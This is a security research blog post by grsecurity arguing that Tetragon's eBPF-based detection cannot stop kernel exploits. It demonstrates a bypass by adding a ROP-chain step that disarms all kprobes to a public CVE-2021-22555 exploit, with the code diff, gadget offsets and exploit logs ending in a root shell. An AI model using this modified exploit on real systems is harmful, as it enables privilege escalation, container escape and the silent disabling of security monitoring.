grsecurity - Tetragone: A Lesson in Security Fundamentals

Introduction

The story began with a tweet about a new eBPF-based Security Observability and Runtime Enforcement solution, named Tetragon, posted by the CTO of the company (Isovalent) that created it.

With a very cute logo, eBPF, Kubernetes, Linux kernel runtime and real-time security enforcer, capable of hooking into all layers of the operating system and application stack, the solution seemed to hit the ground running right from the start. All the features the tool provides can be found at its website: [1].

The "transparent security observability across the stack from the lower level up into the applications. File access, networking, storage, syscalls, escalations, function tracers, ..." sounds interesting, but what really caught our eye was the enforcement capabilities.

On the website, in the section "Automatic Mitigation of Privilege & Container Escapes", the authors claim that "Tetragon adds the ability to prevent privilege, capability, and namespace escalations in the kernel by detecting them and stopping the involved processes".

To demonstrate its effectiveness, the authors show a portion of an apparently simple policy that is supposed to automatically detect a capability change to CAP_SYS_ADMIN and kill the responsible process. As a worthy opponent, an exploit (authored by theflow) for the CVE-2021-22555 vulnerability [5] (Netfilter bug leading to the privilege escalation, more about the bug can be found in an excellent write up at [7]) in the Linux kernel had been selected.

The original version of the Tetragon blog post showed how the exploit process gets killed upon executing the execve() system call with the escalated privilege, which was quickly pointed out to be far too late [2]. Now, the authors claim to be using a similar policy attached to all system calls, in order to catch and kill the exploit earlier. Why the change? We will discuss it in the next section. Regardless of the exact policy and exact moment of detecting the escalation, the exploit process gets ultimately killed. That is excellent, right!?

Well, there is a small (read: huge) caveat, that authors of the Tetragon blog post perhaps unknowingly admit: "The process was killed right when the vulnerability was exploited to escalate privileges". "vulnerability was exploited"?! This can't be good.

Why it can't work

To quickly recap the situation: in attempting to mitigate container escapes, Tetragon tries using advanced Linux kernel features like eBPF and kprobes not to protect the very same kernel from getting exploited, but instead to stop an already successful exploit from using its gains.

Going back to security fundamentals, this approach is simply infeasible: post-exploitation detection/mitigation is at the mercy of an exploit writer putting little to no effort into avoiding tripping these detection mechanisms. To help illustrate this point, it helps to think in terms of the graphic below:

Graphic showing the range of potential for an exploit at different stages

At point 1, a defense employs methods like attack surface reduction to prevent a vulnerability from being reached in the first place. This is highly (even perfectly) effective where it is possible. Once a vulnerability can be triggered, however, an attacker will invoke a series of steps in order to achieve both greater reliability and greater control over the vulnerability. The initial steps (points 2 and 3) are precarious and essential: disrupting these either require significant reworking of the exploit or renders it infeasible (due to a high probability of detection), impossible without an additional vulnerability, or simply impossible.

As illustrated in the graphic, the further along the exploit is able to operate in achieving that reliability and control, the more possibilities (size of the circles in the graphic) open up for it at a lower marginal cost to the attacker. In the case of the exploit used for Tetragon's demo in its blog, the exploit was able to achieve ROP, allowing it to execute any code in the kernel, modify any memory -- the possibilities are virtually endless. The attacker is in full control of the environment in which Tetragon attempts to perform its enforcement actions.

The core message here is: Tetragon (in its aspect of post-exploitation container escape mitigation) simply tries to address the problem too late.

Post-exploitation "effectiveness"

Tetragon aims in its container escape defense for a post-exploitation "mitigation". In order to be even slightly successful without strong and comprehensive pre-exploitation defenses/hardening, it has to adhere to certain principles. We can evaluate Tetragon's effectiveness here by looking at modern principles for its closest post-exploitation comparison: integrity checking / anti-persistence. First, one can only expect some guarantees from a higher privilege level component monitoring or enforcing policies for a lower privilege level component (for example: OS kernel vs user-land programs). Let's call it "privilege domain separation". Second, "Nemo iudex in causa sua": there must be role separation between a monitoring/enforcing component and the one being watched. One cannot expect any reasonable guarantees from a component monitoring or enforcing policies on itself, regardless of the component's privilege level, once an attacker has significant control over that component.

How does Tetragon adhere to the basic principles (in the example above specifically)? Tetragon tries to use Linux kernel privilege level features (eBPF/kprobes) to enforce security policies on... the Linux kernel.

Quite immediately this creates a connotation with another realm of security software: old-style Antivirus (AV). What Tetragon claims to do is no different from an AV vendor with only a userland hook library injected into malware processes, claiming to be able to detect or stop malware, when the malware gets to run first.

Simply, after compromising the core controller, using that (already compromised!) controller's features to mitigate the already successful attack just can't work out well. Furthermore, it does not matter how fine-grained the applied policy might be, it cannot reliably mitigate against a kernel memory corruption bug and all the opportunities it gives to the attacker. To quote Mathias Krause: "When you give control to the weird machine, it is game over".

An attacker can use all sorts of evading/bypassing techniques. Some of them might become a standard part of any exploit by default. Let's take a look at the original exploit used in the Tetragon demonstration. By default, it avoids very effectively a handful of popular mitigations:

W^X - avoids by using ROP
SMEP - avoids by using ROP
SMAP - avoids by using data in sprayed kernel-land objects only

Knowing if the mitigation is or is not enabled oftentimes does not make any big difference. An attacker can simply assume it is there and accommodate the exploit to bypass it just in case. For instance, in the example exploit, one doesn't need to actually confirm the presence of an SMAP-capable CPU before using a technique that avoids tripping over SMAP. The same is the case for Tetragon.

There is however a significant difference between the mitigations listed above and Tetragon. Ideally, useful pre-exploitation mitigations should require, at minimum, significant reworking of exploits and not allow an attacker to circumvent them by generally-applicable additions to an exploit library. They stand in the way of successful or reliable exploitation before or while it occurs. Tetragon however, does not prevent the exploitation at all (it does not make the W^X, SMEP nor SMAP bypasses any harder), it lets it happen and hopes to be able to detect the fallout. It just cannot do that very well (or at all to be frank), because at this point it is fully at the mercy of the attacker, who can quite easily (deliberately or accidently) wipe out all Tetragon's capabilities right away. Since the attacker can, the attacker will.

Mitigation side-effects

Speaking of the fine-grained policy: additional hooks, checks, probes and the like come at a cost. Adding more and more is not free, as the performance hit becomes quickly non-negligible. This fact, the above "effectiveness" discussion and the realization that runtime hooks cannot do better than in-source or compiler-applied mitigations, renders the whole point of Tetragon being the "Automatic Mitigation of Privilege & Container Escapes" solution wrong. Another concern might be the correctness of the policy application. One cannot sprinkle the Linux kernel with haphazardly-chosen probes and hooks without deeper understanding of the contexts the code might run in. For example, how to handle locking correctly at all times without deeper analysis of the source code? It may turn out that a potential policy can only be reliably attached to well defined interfaces in the kernel and ideally to those with a relatively low execution frequency (performance matters too).

What can Tetragon do?

Tetragon could be useful for attack surface reduction, preventing user-land programs from leveraging certain interfaces they do not need. If a thorough analysis of a published security vulnerability is performed, like live-patching or other approaches, it could also be capable of preventing the reachability of that specific known vulnerability. But its post-exploitation mitigation certainly cannot be expected in general to mitigate nor even reliably detect kernel-level exploits.

The exploit(s)

First of all, a full-disclosure: if you expected that I did something sophisticated for the exploit part that an average attacker would not have been able to figure out, you will be disappointed.

The ordeal - Tetragon setup

Setting up Tetragon was the most challenging part of this effort. Instructions available at the GitHub repo [3] seem to focus on the Kubernetes use case and do not describe well involved components, available tools and how to use them. I will spare readers all the gory details of this struggle. Suffice to say, I finally managed to get it to work after building it and running the daemon according to the Development Guide [4] and discovering the tetra CLI tool to manage policies.

The fun - doing the bypass

At this point, I had a working Tetragon setup, with policies that actually get enforced:

wipawel@esx2-ubnt-20-04-02:~/tetragon$ sudo LD_LIBRARY_PATH=$(realpath ./lib) ./tetragon --bpf-lib bpf/objs --btf /home/wipawel/git/tetragon/vmlinux-5.8.0-48-generic --enable-process-cred --enable-process-ns 
[...]
time="2022-05-21T12:37:37+02:00" level=info msg="Loaded BPF maps and events for sensor successfully" sensor=__main__
time="2022-05-21T12:37:37+02:00" level=info msg="Using metadata file" metadata=/home/wipawel/git/tetragon/vmlinux-5.8.0-48-generic
time="2022-05-21T12:37:37+02:00" level=info msg="Loading sensor" name=__main__
time="2022-05-21T12:37:37+02:00" level=info msg="Loading kernel version 5.8.18"
time="2022-05-21T12:37:37+02:00" level=info msg="Loaded BPF maps and events for sensor successfully" sensor=__main__
time="2022-05-21T12:37:37+02:00" level=info msg="Listening for events..."

I created a policy that was supposedly similar to the one used in the Tetragon blog post demo (unfortunately, the crucial part was missing from the policy in the Tetragon blog):

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "capability-protection"
spec:
  kprobes:
  - call: "__x64_sys_execve"
    syscall: true 
    selectors:
    - matchCapabilityChanges:
      - type: Effective
        operator: In
        values:
        - "CAP_SYS_ADMIN"
      matchActions:
      - action: Sigkill
  - call: "do_execve"
    syscall: false
    selectors:
    - matchCapabilityChanges:
      - type: Effective
        operator: In
        values:
        - "CAP_SYS_ADMIN"
      matchActions:
      - action: Sigkill
  - call: "commit_creds"
    syscall: false
    selectors:
    - matchCapabilityChanges:
      - type: Effective
        operator: In
        values:
        - "CAP_SYS_ADMIN"
      matchActions:
      - action: Sigkill

and applied it using tetra:

wipawel@esx2-ubnt-20-04-02:~/tetragon$ ./tetra tracingpolicy add exec.yaml 
time="2022-05-21T12:37:47+02:00" level=info msg="Added generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> __x64_sys_execve"
time="2022-05-21T12:37:47+02:00" level=info msg="Added generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> do_execve"
time="2022-05-21T12:37:47+02:00" level=info msg="Added generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> commit_creds"
time="2022-05-21T12:37:47+02:00" level=info msg="Using metadata file" metadata=/home/wipawel/git/tetragon/vmlinux-5.8.0-48-generic
time="2022-05-21T12:37:47+02:00" level=info msg="Loading sensor" name=__generic_kprobe_sensors__
time="2022-05-21T12:37:47+02:00" level=info msg="Loading kernel version 5.8.18"
time="2022-05-21T12:37:47+02:00" level=info msg="Load probe" Program=bpf/objs/bpf_generic_kprobe_v53.o Type=generic_kprobe
bpf tetragon_kprobe_calls map and progs /sys/fs/bpf/tcpmon/kprobe___x64_sys_execve mapfd 104
time="2022-05-21T12:37:47+02:00" level=info msg="Loaded generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> __x64_sys_execve"
time="2022-05-21T12:37:47+02:00" level=info msg="BPF prog was loaded" label=kprobe/generic_kprobe prog=bpf/objs/bpf_generic_kprobe_v53.o
time="2022-05-21T12:37:47+02:00" level=info msg="Load probe" Program=bpf/objs/bpf_generic_kprobe_v53.o Type=generic_kprobe
bpf tetragon_kprobe_calls map and progs /sys/fs/bpf/tcpmon/kprobe_do_execve mapfd 106
time="2022-05-21T12:37:48+02:00" level=info msg="Loaded generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> do_execve"
time="2022-05-21T12:37:48+02:00" level=info msg="BPF prog was loaded" label=kprobe/generic_kprobe prog=bpf/objs/bpf_generic_kprobe_v53.o
time="2022-05-21T12:37:48+02:00" level=info msg="Load probe" Program=bpf/objs/bpf_generic_kprobe_v53.o Type=generic_kprobe
bpf tetragon_kprobe_calls map and progs /sys/fs/bpf/tcpmon/kprobe_commit_creds mapfd 108
time="2022-05-21T12:37:48+02:00" level=info msg="Loaded generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> commit_creds"
time="2022-05-21T12:37:48+02:00" level=info msg="BPF prog was loaded" label=kprobe/generic_kprobe prog=bpf/objs/bpf_generic_kprobe_v53.o
time="2022-05-21T12:37:48+02:00" level=info msg="Loaded BPF maps and events for sensor successfully" sensor=__generic_kprobe_sensors__

Running the original exploit proved that it got killed at the same spot as presented in the blog:

wipawel@esx2-ubnt-20-04-02:~$ ./exploit
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: 804
[+] real_idx: 7f2

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff92bc6e099000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff92bc6e420000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffb7278380
[+] kbase_addr: ffffffffb6200000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
Killed

Finally! Now we can get to the juice.

How to bypass Tetragon?

The team immediately proposed a number of feasible ideas, but it was Friday early afternoon and I really wanted to finish the bypass before the end of the business day, so I wanted the easiest bypass I could spot quickly requiring as few modifications to the original exploit as possible.

What is the easiest way of controlling Linux kernel runtime behavior? The sysctl of course...

wipawel@esx2-ubnt-20-04-02:~/tetragon$ sudo sysctl -a|grep -i bpf
[sudo] password for wipawel: 
kernel.bpf_stats_enabled = 0
kernel.unprivileged_bpf_disabled = 0
net.core.bpf_jit_enable = 1
net.core.bpf_jit_harden = 0
net.core.bpf_jit_kallsyms = 1
net.core.bpf_jit_limit = 264241152

Nothing in there.

What is the second easiest way? The sysfs...

I went into the /sys/fs/bpf directory to look around but did not find anything particularly useful. But, at this moment something clicked in my mind: Tetragon uses kprobes! Look at the log entry:

time="2022-05-21T12:37:47+02:00" level=info msg="Load probe" Program=bpf/objs/bpf_generic_kprobe_v53.o Type=generic_kprobe
bpf tetragon_kprobe_calls map and progs /sys/fs/bpf/tcpmon/kprobe_do_execve mapfd 106

I knew what to do with it.

root@esx2-ubnt-20-04-02:/# cd /sys/kernel/debug/kprobes/
root@esx2-ubnt-20-04-02:/sys/kernel/debug/kprobes# ls
blacklist  enabled  list

There is a general kprobes kill-switch exposed via sysfs!

Let's take a look at the kernel function attached to the enabled file:

In kernel/kprobes.c:

static ssize_t write_enabled_file_bool(struct file *file,
               const char __user *user_buf, size_t count, loff_t *ppos)
{
        char buf[32];
        size_t buf_size;
        int ret = 0;

        buf_size = min(count, (sizeof(buf)-1));
        if (copy_from_user(buf, user_buf, buf_size))
                return -EFAULT;

        buf[buf_size] = '\0';
        switch (buf[0]) {
        case 'y':
        case 'Y':
        case '1':
                ret = arm_all_kprobes();
                break;
        case 'n':
        case 'N':
        case '0':
                ret = disarm_all_kprobes();
                break;
        default:
                return -EINVAL;
        }

        if (ret)
                return ret;

        return count;
}

static const struct file_operations fops_kp = {
        .read =         read_enabled_file_bool,
        .write =        write_enabled_file_bool,
        .llseek =       default_llseek,
};

Notice the disarm_all_kprobes() function. That is the solution I was looking for: simple, effective and even persistent.

Unfortunately, in the Ubuntu kernel 5.8.0-48-generic the disarm_all_kprobes() function is inlined, so calling it directly via the exploit's ROP would be cumbersome (for an early Friday afternoon). Hence I decided to call the write_enabled_file_bool() function directly. It takes four parameters:

struct file *file - which is not used, can be NULL
const char __user *user_buf - indicating the parameters ('y'/'n' to enable/disable the kprobes)
size_t count - indicating size of the parameter passed
loff_t *ppos - offset that is not used and can be NULL

Also, notice how convenient this function is: despite it requiring passing a string to disable kprobes, it expects it to copy its content from user-space directly (it is a sysfs file handler after all!). So, there is no problem as far as SMAP is concerned.

Now, time to add the write_enabled_file_bool() invocation to the ROP chain of theflow's exploit:

--- exploit.c    2022-05-21 12:37:05.379811547 +0200
+++ exploit_mod.c    2022-05-21 12:37:01.145040789 +0200
@@ -158,6 +158,9 @@
 // 0xffffffff810005ae : pop rbp ; ret
 #define POP_RBP_RET 0x5AE

+// 0xffffffff810ffb88: pop rdx; pop rbp; ret;
+#define POP_RDX_RBP_RET 0xFFB88
+
 // 0xffffffff81557894 : mov rdi, rax ; jne 0xffffffff81557888 ; xor eax, eax ; ret
 #define MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET 0x557894
 // 0xffffffff810724db : cmp rcx, 4 ; jne 0xffffffff810724c0 ; pop rbp ; ret
@@ -167,6 +170,7 @@
 #define SWITCH_TASK_NAMESPACES 0xC7A50
 #define COMMIT_CREDS 0xC8C80
 #define PREPARE_KERNEL_CRED 0xC9110
+#define WRITE_ENABLED_FILE_BOOL 0x17E050

 #define ANON_PIPE_BUF_OPS 0x1078380
 #define INIT_NSPROXY 0x1663080
@@ -322,6 +326,8 @@
   return 0;
 }

+const char *disable = "n";
+
 // Note: Must not touch offset 0x10-0x18.
 void build_krop(char *buf, uint64_t kbase_addr, uint64_t scratchpad_addr) {
   uint64_t *rop;
@@ -396,6 +402,17 @@
   *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
   *rop++ = kbase_addr + COMMIT_CREDS;

+  *rop++ = kbase_addr + POP_RDI_RET;
+  *rop++ = 0; // RDI
+  *rop++ = kbase_addr + POP_RSI_RET;
+  *rop++ = disable; // RSI
+  *rop++ = kbase_addr + POP_RDX_RBP_RET;
+  *rop++ = 0xDEADBEEF; // RBP
+  *rop++ = 1; // RDX
+  *rop++ = kbase_addr + POP_RCX_RET;
+  *rop++ = 0; // RCX
+  *rop++ = kbase_addr + WRITE_ENABLED_FILE_BOOL;
+
   // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
   *rop++ = kbase_addr + POP_RDI_RET;
   *rop++ = 1; // RDI

All I had to do is to populate the four parameters of the function. For that, I had RDI, RSI and RCX gadgets already present in the original exploit code. I needed to find another one for RDX. This task was done with ropper within five minutes. I decided to use a POP_RDX_RBP_RET gadget located in the .text section at offset 0xFFB88.

The RDI holding the file pointer value can be 0, RSI holding address of the string in user-land can just have an address of the disable string I put in there, RDX corresponding to the count parameter describes the size of the string (1 char), and RCX for ppos offset can be 0 as well.

With these modifications, I compiled the exploit, and voila:

wipawel@esx2-ubnt-20-04-02:~$ ./exploit_mod 
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: bf9
[+] real_idx: bc5

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff92bc6a3b0000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff92bc69a90000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffb7278380
[+] kbase_addr: ffffffffb6200000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@esx2-ubnt-20-04-02:/#

Tetragon has been successfully bypassed within circa 2 hours after first setting it up (which took nearly two days).

There is also a nice side-effect of the write_enabled_file_bool() (ab)use: it keeps the kprobes disarmed and disabled. All other policies of Tetragon using kprobes will not work until the kprobes are re-enabled again. Even newly added policies to Tetragon do not work, because of the disabled kprobes.

Tetragon really became Tetragone.

Just in case one wonders if adding the CAP_SYS_ADMIN capability change check to the write_enabled_file_bool() function would solve the problem, notice that at the point this function is called, the privilege has been already elevated and hence such a check would be bogus.

Funny twist of events

After publishing the outcome of this effort on Twitter, the Isovalent CTO came back accusing me of playing unfair, because I did not publish the policy I used. That was a rather bold move, because they did not publish theirs either in the first place. I asked if he could publish the one they used. He agreed and provided it (from [6]):

apiVersion: cilium.io/v1alpha1
 kind: TracingPolicy
 metadata:
   name: "capability-change"
 spec:
   kprobes:
   - call: "__close_fd"
     syscall: false
     args:
     - index: 0
       type: "nop"
     - index: 1
       type: "nop"
     selectors:
     - matchCapabilities:
       - type: Effective
         operator: In
         values:
         - "CAP_SYS_ADMIN"
       matchCapabilityChanges:
       - type: Effective
         operator: In
         values:
         - "CAP_SYS_ADMIN"
       matchActions:
       - action: Sigkill
         argError: 0

Notice, that it is unlikely to be the original policy they used, as the initial one in the blog targeted the execve() syscall while the updated one targeted the close() syscall where the actual escalation occurred (ignore the open() error in the quote below).

From the Tetragon website [1]:

Image of a hasty/inaccurate edit to the Tetragon blog

But, never mind. Let's try the exploit against it:

wipawel@esx2-ubnt-20-04-02:~/tetragon$ ./tetra tracingpolicy add close.yaml 

time="2022-05-21T13:58:21+02:00" level=warning msg="kprobe spec validation: type (struct files_struct *) of argument 0 does not match spec type (nop)\n"
time="2022-05-21T13:58:21+02:00" level=info msg="Added generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> __close_fd"
time="2022-05-21T13:58:21+02:00" level=info msg="Using metadata file" metadata=/home/wipawel/git/tetragon/vmlinux-5.8.0-48-generic
time="2022-05-21T13:58:21+02:00" level=info msg="Loading sensor" name=__generic_kprobe_sensors__
time="2022-05-21T13:58:21+02:00" level=info msg="Loading kernel version 5.8.18"
time="2022-05-21T13:58:21+02:00" level=info msg="Load probe" Program=bpf/objs/bpf_generic_kprobe_v53.o Type=generic_kprobe
bpf tetragon_kprobe_calls map and progs /sys/fs/bpf/tcpmon/kprobe___close_fd mapfd 110
time="2022-05-21T13:58:22+02:00" level=info msg="Loaded generic kprobe sensor: bpf/objs/bpf_generic_kprobe_v53.o -> __close_fd"
time="2022-05-21T13:58:22+02:00" level=info msg="BPF prog was loaded" label=kprobe/generic_kprobe prog=bpf/objs/bpf_generic_kprobe_v53.o
time="2022-05-21T13:58:22+02:00" level=info msg="Loaded BPF maps and events for sensor successfully" sensor=__generic_kprobe_sensors__

wipawel@esx2-ubnt-20-04-02:~$ ./exploit_mod 
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: 801
[+] real_idx: 7ec

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff92bc653de000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff92bc64590000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffb7278380
[+] kbase_addr: ffffffffb6200000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@esx2-ubnt-20-04-02:/#

Still works! But, I like to be thorough. Let's reboot the box and try again.

Upon applying the policy provided by the Isovalent CTO, the Tetragon daemon terminated itself! This isn't surprising — other undesired terminations due to the coarse-grained policy preventing legitimate apps like sudo from working were observed during testing. Contrary to their blog update, such a simple-looking policy on all syscalls rather than just close() is likely not what mitigating should/would look like in production.

Regardless, the exploit naturally still worked fine.

"You win this round, but..."

By publishing this simple, trivially-reusable bypass, we expect Tetragon to attempt some workaround. This would of course ignore the point of this blog and be bypassed by another, equally-trivial ROP addition. It will be particularly notable if those involved in Tetragon push for upstream Linux to harden the code around kprobes in an attempt to prevent this one specific attack, as it'd be an implicit admission of the eBPF-based security approach being incapable of defending itself from the threat of kernel exploits. Time will tell, but having been involved in this space for over 20 years, the general scenario that seems to play out time and again (e.g. for KASLR) is that the side proposing and invested into the indefensible mitigation continues spending years propping it up with little fixes, providing useful fodder for security conference talks, while the underlying fundamentals don't change and the other side eventually gets tired of pointing this out.

There will be no CVE for the bypass described above, and we will not request one, because there's no actual vulnerability of a specific defined security boundary involved, just one of innumerably many possibilities that could be published or used, even without any knowledge of any post-exploitation policies of Tetragon in place, contrary to what was claimed [8].

What's the alternative?

Typically, we prefer to let technical results speak for themselves, but in this instance, we were specifically asked to add a section about alternatives [9].

The Isovalent CTO asked on Twitter several times about alternatives, suggesting that since no alternatives exist, anything is better than nothing (despite, for instance, grsecurity existing for over two decades). So, what is the alternative to kernel post-exploitation "mitigation"?

The only sensible alternative is to add pre-exploitation defense. One should prevent kernel vulnerabilities from being present/reached, but if that still happens, one should make exploitation meaningfully harder (NB: not in a 2 hours sense, but in a "plenty of time to QA and roll out updates" sense) or impossible. Otherwise, it is too late and all bets are off.

Let's take grsecurity as an obvious example. It comes with several layers of protection against exploits, such as the one used above. We can use three examples which map directly to the first three points from our earlier graphic:

Unprivileged user namespaces are not supported
Slab allocations are hardened to hinder and detect heap-based memory corruption bugs
Control Flow Integrity enforced by RAP, to prevent Return Oriented Programming (ROP) attacks

Conclusion

Realistically, this blog will likely change little (other than perhaps the removal of the section in the Tetragon blog about preventing kernel exploits, as happened late yesterday), as obvious strong commercial incentives continue to exist for appearing to address the large problem of kernel exploits. We would echo the suggestion of several other experts that Tetragon instead focus its efforts on attack surface reduction and issues related to userland, as its too-late involvement in the process of kernel exploitation provides little more than a false sense of security.

References

[1] https://isovalent.com/blog/post/2022-05-16-tetragon

[2] https://twitter.com/_minipli/status/1527194006551142400

[3] https://github.com/cilium/tetragon

[4] https://github.com/cilium/tetragon/blob/main/docs/contributing/development/README.md

[5] https://github.com/google/security-research/blob/master/pocs/linux/cve-2021-22555/exploit.c

[6] https://gist.github.com/tgraf/e5bd8fb4955cac139b02b370a87b268a

[7] https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html#bypassing-smap

[8] https://twitter.com/tgraf__/status/1527701890842099717

[9] https://twitter.com/tgraf__/status/1527668174786899970